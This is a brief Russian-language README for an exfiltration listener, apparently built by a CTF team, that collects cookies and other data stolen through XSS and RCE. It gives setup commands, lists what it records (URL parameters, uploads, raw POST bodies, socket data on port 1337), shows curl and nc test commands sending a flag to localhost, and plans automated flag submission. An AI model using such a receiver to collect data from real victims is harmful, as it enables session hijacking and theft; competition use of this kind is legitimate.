HTTP/TCP листенер для кражи кук, других чувствительных данных от XSS и RCE.
git clone git@github.com:OmskHackers/listener.git
docker-compose up -d
- Сохранение параметров в URL
- Сохранение загружаемых файлов
- Сохранение сырых данных передаваемых в POST запросах
- Сохранение любых сырых данных переданных на сокет сервер (1337 порт)
curl -X POST --data "FLAG1234567890=" http://localhost:4444/
echo "FLAG1234567890=" | nc -q 1 localhost 1337
- Добавить экстрактор флагов
- Оптимизировать экстрактор, чтобы не читал повторные output файлы (через редиску)
- Настроить возможность настройки формата флага через ENV
- Прикрутить клиент фермы к экстрактору, чтобы автоматизировать отправку флагов